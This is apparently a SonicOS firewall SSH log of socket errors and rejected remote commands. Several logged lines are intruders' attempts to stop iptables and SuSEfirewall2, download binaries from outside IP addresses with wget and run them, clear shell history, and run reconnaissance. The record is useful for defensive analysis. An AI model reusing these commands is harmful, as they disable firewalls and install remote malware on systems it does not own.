01/31 12:33:50.528: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/31 14:52:44.128: fatal - Read from socket failed: errno = 0x36, connection_in 33
01/31 15:24:59.720: fatal - Read from socket failed: errno = 0x36, connection_in 33
01/31 18:30:14.928: fatal - Read from socket failed: errno = 0x36, connection_in 42
01/31 18:33:16.176: fatal - Read from socket failed: errno = 0x36, connection_in 33
01/31 23:36:08.880: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/01 01:30:52.704: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/01 01:31:32.880: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/01 02:03:51.896: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/01 07:54:52.464: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/01 11:45:39.368: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/01 13:53:27.768: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/01 17:35:04.048: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/01 18:57:29.688: fatal - Read from socket failed: errno = 0x3a, connection_in 42
02/01 19:50:22.624: fatal - Read from socket failed: errno = 0x36, connection_in 45
02/01 21:42:15.880: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/01 23:29:27.720: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/01 23:49:44.704: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/02 00:03:40.752: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/02 11:12:03.256: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/02 11:45:07.272: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/02 12:11:34.608: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/02 15:11:55.944: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/02 15:21:58.880: fatal - Read from socket failed: errno = 0x3a, connection_in 42
02/02 15:21:59.032: fatal - Read from socket failed: errno = 0x3a, connection_in 89
02/02 15:21:59.064: fatal - Read from socket failed: errno = 0x3a, connection_in 53
02/02 15:22:01.464: fatal - Read from socket failed: errno = 0x3a, connection_in 50
02/02 15:22:03.752: fatal - do_exec_no_pty not supported in SonicOS command 'cd /tmp;wget http://222.186.30.148:8080/cdk;chmod 777 cdk;./cdk'
02/02 15:22:11.880: fatal - Read from socket failed: errno = 0x3a, connection_in 53
02/02 15:22:13.048: fatal - Read from socket failed: errno = 0x3a, connection_in 89
02/02 15:22:15.512: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/02 15:22:18.752: fatal - do_exec_no_pty not supported in SonicOS command 'cd /tmp;wget http://222.186.30.148:8080/cdk;chmod 777 cdk;./cdk'
02/02 18:05:14.416: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/02 20:11:45.032: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/02 23:43:52.832: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/02 23:52:56.816: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/03 02:31:00.544: fatal - Read from socket failed: errno = 0x3a, connection_in 33
02/03 03:30:23.944: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/03 06:31:11.128: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/03 09:17:20.272: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/03 09:51:37.320: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/03 10:05:05.528: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/03 11:47:28.928: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/03 12:06:05.256: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/03 15:37:13.912: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/03 17:08:00.304: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/03 19:48:03.656: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/03 20:03:34.912: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/03 21:16:59.832: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/03 22:33:08.640: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/04 00:55:05.032: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/04 00:55:55.784: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/04 01:58:47.768: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/04 05:58:19.688: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/04 09:10:38.128: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/04 09:56:25.128: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/04 10:43:01.944: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/04 13:26:25.560: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/04 13:30:02.320: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/04 17:15:43.576: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/04 17:25:09.224: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/04 21:09:18.384: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/04 22:22:49.432: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/04 23:38:45.368: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/05 01:25:56.800: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/05 02:14:52.944: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/05 02:26:59.896: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/05 02:37:46.080: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/05 07:08:14.192: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/05 08:23:46.352: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/05 09:18:00.864: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/05 14:53:17.576: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/05 17:04:54.016: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/05 17:22:34.288: fatal - Read from socket failed: errno = 0x36, connection_in 45
02/05 17:40:12.032: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/05 18:51:39.384: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/05 21:32:25.496: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/05 21:33:47.608: fatal - Read from socket failed: errno = 0x3a, connection_in 42
02/05 22:19:17.464: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/05 22:26:24.048: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/05 23:23:01.880: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/05 23:28:00.064: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/05 23:39:47.224: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/06 00:57:37.464: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/06 03:21:43.208: fatal - Read from socket failed: errno = 0x36, connection_in 51
02/06 04:01:45.912: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/06 06:17:01.432: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/06 07:01:30.144: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/06 08:27:24.208: fatal - do_exec_no_pty not supported in SonicOS command '/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.34.203:89/Someone915;chmod 755 Someone915;./Someone915;'
02/06 08:33:55.720: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/06 09:00:43.656: fatal - do_exec_no_pty not supported in SonicOS command '/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.34.203:89/Client;chmod 7777 Client;./Client;'
02/06 09:06:40.688: fatal - do_exec_no_pty not supported in SonicOS command '/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.34.203:89/Someone915;chmod 777 Someone915;./Someone915;'
02/06 09:36:37.320: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/06 10:04:51.448: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/06 11:39:17.304: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/06 15:42:59.528: fatal - do_exec_no_pty not supported in SonicOS command '/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.34.203:89/chinasyn;chmod 7777 chinasyn;./chinasyn;'
02/06 15:43:28.704: fatal - do_exec_no_pty not supported in SonicOS command '/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.58.136:373/NNTTZ;chmod 777 NNTTZ;./NNTTZ;'
02/06 15:45:59.672: fatal - do_exec_no_pty not supported in SonicOS command '/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.58.136:373/AADK;chmod 777 AADK;./AADK;'
02/06 16:04:15.304: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/06 16:04:16.048: fatal - Read from socket failed: errno = 0x36, connection_in 50
02/06 16:56:11.928: fatal - Read from socket failed: errno = 0x36, connection_in 52
02/06 16:59:56.352: fatal - Read from socket failed: errno = 0x3c, connection_in 42
02/06 19:53:45.112: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/06 19:57:00.528: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/06 19:59:11.064: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/06 20:47:58.496: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/06 22:05:51.256: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/06 23:19:59.800: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/07 00:02:46.448: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/07 00:04:35.224: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/07 00:05:37.416: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/07 05:43:07.256: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/07 07:01:36.736: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/07 07:07:39.176: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/07 07:12:38.720: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/07 07:26:20.352: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/07 08:00:19.944: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/07 12:39:30.080: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/07 12:52:29.896: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/08 01:16:14.496: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/08 04:09:25.128: fatal - do_exec_no_pty not supported in SonicOS command '/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.34.203:89/Someone915;chmod 777 Someone915;./Someone915;'
02/08 04:44:42.144: fatal - do_exec_no_pty not supported in SonicOS command '/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.34.203:89/Someone915;chmod 755 Someone915;./Someone915;'
02/08 13:52:40.256: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/08 14:07:26.160: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/08 14:49:52.272: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/08 17:13:35.512: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/08 20:41:51.480: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/09 00:40:05.736: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/09 00:40:56.208: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/09 02:15:42.352: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/09 05:42:34.688: fatal - do_exec_no_pty not supported in SonicOS command 'unset HISTFILE ; unset HISTSIZE'
02/09 05:42:34.704: fatal - do_exec_no_pty not supported in SonicOS command 'unset HISTFILE ; unset HISTSIZE'
02/09 05:42:34.816: fatal - do_exec_no_pty not supported in SonicOS command 'unset HISTFILE ; unset HISTSIZE'
02/09 06:03:17.416: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/09 14:34:49.480: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/09 18:49:44.768: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/09 18:57:28.544: fatal - Read from socket failed: errno = 0x3a, connection_in 45
02/09 19:29:40.848: fatal - Read from socket failed: errno = 0x36, connection_in 33
02/09 23:48:04.256: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/10 00:06:13.656: fatal - Read from socket failed: errno = 0x36, connection_in 42
02/10 00:54:52.384: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/10 02:05:12.048: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/10 02:48:42.624: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/10 12:18:01.656: fatal - Read from socket failed: errno = 0x3a, connection_in 42
02/10 12:18:12.832: fatal - Read from socket failed: errno = 0x3a, connection_in 50
02/10 12:18:24.032: fatal - Read from socket failed: errno = 0x3a, connection_in 53
02/10 12:18:34.512: fatal - Read from socket failed: errno = 0x3a, connection_in 89
02/10 12:19:05.592: fatal - Read from socket failed: errno = 0x3a, connection_in 33
02/10 12:19:15.576: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/10 12:19:25.560: fatal - Read from socket failed: errno = 0x3a, connection_in 52
02/10 12:19:35.416: fatal - Read from socket failed: errno = 0x3a, connection_in 89
02/10 12:20:25.672: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/10 12:20:36.064: fatal - Read from socket failed: errno = 0x3a, connection_in 50
02/10 12:20:46.016: fatal - Read from socket failed: errno = 0x3a, connection_in 53
02/10 12:21:35.528: fatal - Read from socket failed: errno = 0x3a, connection_in 89
02/10 12:21:45.512: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/10 12:21:55.688: fatal - Read from socket failed: errno = 0x3a, connection_in 53
02/10 12:22:46.016: fatal - Read from socket failed: errno = 0x3a, connection_in 89
02/10 12:22:55.496: fatal - Read from socket failed: errno = 0x3a, connection_in 52
02/10 12:23:05.336: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/10 12:23:55.208: fatal - Read from socket failed: errno = 0x3a, connection_in 53
02/10 12:24:04.832: fatal - Read from socket failed: errno = 0x3a, connection_in 52
02/10 12:24:14.832: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/10 12:25:04.672: fatal - Read from socket failed: errno = 0x3a, connection_in 53
02/10 12:25:14.544: fatal - Read from socket failed: errno = 0x3a, connection_in 52
02/10 12:25:24.192: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/10 12:26:13.704: fatal - Read from socket failed: errno = 0x3a, connection_in 57
02/10 12:26:23.704: fatal - Read from socket failed: errno = 0x3a, connection_in 92
02/10 12:26:33.864: fatal - Read from socket failed: errno = 0x3a, connection_in 50
02/10 12:27:23.048: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/10 12:27:33.048: fatal - Read from socket failed: errno = 0x3a, connection_in 57
02/10 12:27:42.864: fatal - Read from socket failed: errno = 0x3a, connection_in 50
02/10 12:28:32.672: fatal - Read from socket failed: errno = 0x3a, connection_in 53
02/10 12:28:42.528: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/10 12:28:52.528: fatal - Read from socket failed: errno = 0x3a, connection_in 51
02/10 12:29:42.048: fatal - Read from socket failed: errno = 0x3a, connection_in 50
02/10 12:29:51.704: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/10 12:30:01.720: fatal - Read from socket failed: errno = 0x3a, connection_in 52
02/10 12:30:51.272: fatal - Read from socket failed: errno = 0x3a, connection_in 51
02/10 12:31:01.096: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/10 12:31:11.112: fatal - Read from socket failed: errno = 0x3a, connection_in 79
02/10 12:32:00.640: fatal - Read from socket failed: errno = 0x3a, connection_in 51
02/10 12:32:10.704: fatal - Read from socket failed: errno = 0x3a, connection_in 50
02/10 12:32:20.496: fatal - Read from socket failed: errno = 0x3a, connection_in 79
02/10 12:33:08.576: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/10 12:33:18.112: fatal - Read from socket failed: errno = 0x3a, connection_in 50
02/10 12:33:27.896: fatal - Read from socket failed: errno = 0x3a, connection_in 89
02/10 12:34:15.928: fatal - Read from socket failed: errno = 0x3a, connection_in 51
02/10 12:34:26.160: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/10 12:34:36.160: fatal - Read from socket failed: errno = 0x3a, connection_in 89
02/10 12:35:25.576: fatal - Read from socket failed: errno = 0x3a, connection_in 52
02/10 12:35:35.576: fatal - Read from socket failed: errno = 0x3a, connection_in 50
02/10 12:35:45.144: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/10 12:36:34.320: fatal - Read from socket failed: errno = 0x3a, connection_in 51
02/10 12:36:44.000: fatal - Read from socket failed: errno = 0x3a, connection_in 53
02/10 12:36:53.816: fatal - Read from socket failed: errno = 0x3a, connection_in 50
02/10 12:37:43.336: fatal - Read from socket failed: errno = 0x3a, connection_in 52
02/10 12:37:53.016: fatal - Read from socket failed: errno = 0x3a, connection_in 51
02/10 12:38:02.688: fatal - Read from socket failed: errno = 0x3a, connection_in 50
02/10 12:47:05.448: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/10 12:47:12.128: fatal - Read from socket failed: errno = 0x3a, connection_in 52
02/10 12:48:11.144: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/10 12:48:20.944: fatal - Read from socket failed: errno = 0x3a, connection_in 53
02/10 12:49:19.672: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/10 12:49:29.496: fatal - Read from socket failed: errno = 0x3a, connection_in 92
02/10 12:50:28.368: fatal - Read from socket failed: errno = 0x3a, connection_in 50
02/10 12:50:38.032: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/10 14:15:52.704: fatal - Read from socket failed: errno = 0x36, connection_in 46
02/10 15:12:22.544: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/10 17:38:46.832: fatal - Read from socket failed: errno = 0x36, connection_in 50
02/10 21:32:44.128: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/10 22:07:52.336: fatal - Read from socket failed: errno = 0x36, connection_in 51
02/11 01:47:30.400: fatal - Read from socket failed: errno = 0x36, connection_in 46
02/11 04:42:25.128: fatal - Read from socket failed: errno = 0x36, connection_in 46
02/11 04:57:57.160: fatal - Read from socket failed: errno = 0x36, connection_in 46
02/11 08:09:51.608: fatal - do_exec_no_pty not supported in SonicOS command 'ps; uname -a; id; uname -a; uname -a; id ; uname -a'
02/11 08:52:48.048: fatal - do_exec_no_pty not supported in SonicOS command 'ps; uname -a; id; uname -a; uname -a; id ; uname -a'
02/11 08:58:11.608: fatal - Read from socket failed: errno = 0x36, connection_in 46
02/11 09:21:09.032: fatal - do_exec_no_pty not supported in SonicOS command 'ps; uname -a; id; uname -a; uname -a; id ; uname -a'
02/11 09:50:32.880: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/11 10:05:00.672: fatal - do_exec_no_pty not supported in SonicOS command 'ps; uname -a; id; uname -a; uname -a; id ; uname -a'
02/11 11:08:40.880: fatal - do_exec_no_pty not supported in SonicOS command 'ps; uname -a; id; uname -a; uname -a; id ; uname -a'
02/11 11:18:28.432: fatal - do_exec_no_pty not supported in SonicOS command 'ps; uname -a; id; uname -a; uname -a; id ; uname -a'
02/11 12:33:43.160: fatal - do_exec_no_pty not supported in SonicOS command 'ps; uname -a; id; uname -a; uname -a; id ; uname -a'
02/11 13:08:41.512: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:08:57.672: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:09:15.608: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:09:32.880: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:09:49.272: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:10:05.112: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:10:21.672: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:10:37.176: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:10:52.224: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:11:06.704: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:11:21.368: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:11:35.800: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:11:50.256: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:12:01.688: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:12:11.064: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:12:21.480: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:12:33.272: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:12:46.192: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:12:59.192: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:13:12.432: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:13:23.944: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:13:32.144: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:13:40.464: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:13:48.400: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:13:56.640: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:14:04.400: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:14:14.224: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:14:27.336: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:14:40.240: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:14:53.544: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:15:06.320: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:15:19.320: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:15:32.240: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:15:45.400: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:15:58.640: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:16:10.848: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:16:22.320: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:16:35.464: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:16:48.688: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:17:00.864: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:17:12.912: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:17:25.688: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:17:38.928: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:17:52.112: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:18:05.144: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:18:18.224: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:18:31.384: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:18:44.464: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:18:55.928: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:19:06.048: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:19:19.112: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:19:32.384: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:19:45.864: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:19:58.912: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:20:11.864: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:20:25.432: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:20:37.768: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:20:49.784: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:21:02.640: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:21:16.064: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:21:27.528: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:21:35.880: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:21:43.832: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:21:53.864: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:22:06.928: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:22:20.320: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:22:33.624: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:22:46.320: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:22:59.320: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:23:12.320: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:23:25.256: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:23:38.224: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:23:51.288: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:24:04.144: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:24:17.608: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:24:30.544: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:24:43.720: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:24:56.352: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:25:09.176: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:25:22.208: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:25:35.352: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:25:48.528: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:26:00.576: fatal - do_exec_no_pty not supported in SonicOS command 'ps; uname -a; id; uname -a; uname -a; id ; uname -a'
02/11 13:26:01.608: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:26:15.032: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:26:28.192: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:26:41.352: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:26:52.848: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:27:01.416: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:27:09.448: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:27:17.688: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:27:25.912: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:27:34.160: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:27:44.144: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:27:55.544: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:28:05.752: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:28:18.560: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:28:31.736: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:28:44.848: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:28:57.848: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:29:11.048: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:29:24.432: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:29:37.576: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:29:50.544: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:30:03.208: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:30:16.416: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:30:29.416: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:30:42.208: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:30:55.096: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:31:08.560: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:31:21.208: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:31:34.288: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:31:47.080: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:32:00.240: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:32:13.208: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:32:26.256: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:32:39.112: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
